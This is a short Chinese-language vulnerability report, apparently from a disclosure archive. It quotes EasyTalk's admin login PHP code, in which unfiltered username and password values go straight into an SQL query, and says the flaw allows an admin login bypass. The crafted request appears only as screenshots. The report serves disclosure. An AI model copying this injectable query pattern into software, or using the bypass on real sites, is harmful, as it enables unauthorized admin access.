EasyTalk SQL注入导致后台登录绕过

### 简要描述： EasyTalk SQL注入导致后台登录绕过 ### 详细说明： 漏洞存在文件：/Admin/Lib/Action/LoginAction.class.php： ``` public function dologin() { parent::toadmin(); $user_name=$_POST['username']; $password=$_POST['password']; $authcode=trim($_POST['authcode']); if (!$user_name || !$password || !$authcode || $authcode!=$_SESSION['authcode']) { $this->redirect('/Login/index'); exit; } if (ET_UC==TRUE) { list($uid, $username, $password, $email) = uc_user_login($user_name,$password); if($username && $uid>0) { $user = M("Users")->where("user_name='$username' AND isadmin=1")->field('user_id,user_name')->find(); if($user) { Cookie::set('adminauth', authcode("$user_name\t$user[user_id]",'ENCODE')); echo '<script>parent.location.href="'.SITE_URL.'/admin.php?s=/Index"</script>'; } else { $this->redirect('/Login/index'); } } else { $this->redirect('/Login/index'); } } else { $password=md5(md5($password)); $user = M("Users")->where("user_name='$user_name' AND password='$password' AND isadmin=1")->find(); if($user) { Cookie::set('adminauth', authcode("$user_name\t$user[user_id]",'ENCODE')); echo '<script>parent.location.href="'.SITE_URL.'/admin.php?s=/Index"</script>'; } else { $this->redirect('/Login/index'); } } } ``` user那么和password都没有过滤，导致SQL注入。 ### 漏洞证明： 登陆是构造如下请求，验证码一定为当前验证码： [<img src="https://images.seebug.org/upload/201402/17115336743c778e110bf5b1fdebad1b9131a772.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/17115336743c778e110bf5b1fdebad1b9131a772.png) 成功登陆： [<img src="https://images.seebug.org/upload/201402/171154088b4b743320760263ba8bda38d563296c.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/171154088b4b743320760263ba8bda38d563296c.png)